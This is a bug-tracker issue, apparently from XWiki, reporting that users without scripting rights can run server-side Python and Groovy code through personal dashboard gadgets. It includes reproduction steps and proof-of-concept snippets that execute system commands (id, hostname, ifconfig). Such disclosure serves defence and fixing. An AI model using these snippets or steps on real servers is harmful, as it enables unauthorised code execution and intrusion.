Details
-
Bug
-
Resolution: Duplicate
-
Critical
-
None
-
7.2, 8.4.4, 11.10.2
-
High
-
Unknown
-
Description
Registered users without scripting/programming permissions are able to execute python/groovy scripts while editing personal dashboards.
Full path to reproduce:
1) Create new user on xwiki.org (or myxwiki.org)
2) Go to profile -> Edit -> My dashboard -> Add gadget
3) Choose either python or groovy.
4) Paste following python/groovy code (for unix powered xwiki)
import os print(os.popen("id").read()) print(os.popen("hostname").read()) print(os.popen("ifconfig").read())
r = Runtime.getRuntime() proc = r.exec('id'); BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream())); String s1 = null; while ((s1 = stdInput1.readLine()) != null) { print s1; }
5) Submit the gadget
Expected behaviour:
-User is unable to execute server side code due to lack of permissions
Current behaviour:
-User can execute server side code as seen on a screenshots.
This issue affects all versions of xwiki that have personal dashboard feature.
Attachments
Issue Links
- duplicates
-
XWIKI-14247 User without scripting rights can execute velocity/python scripts through velocity/python gadgets in Dashboard WebHome and User Profile dashboard.
- Closed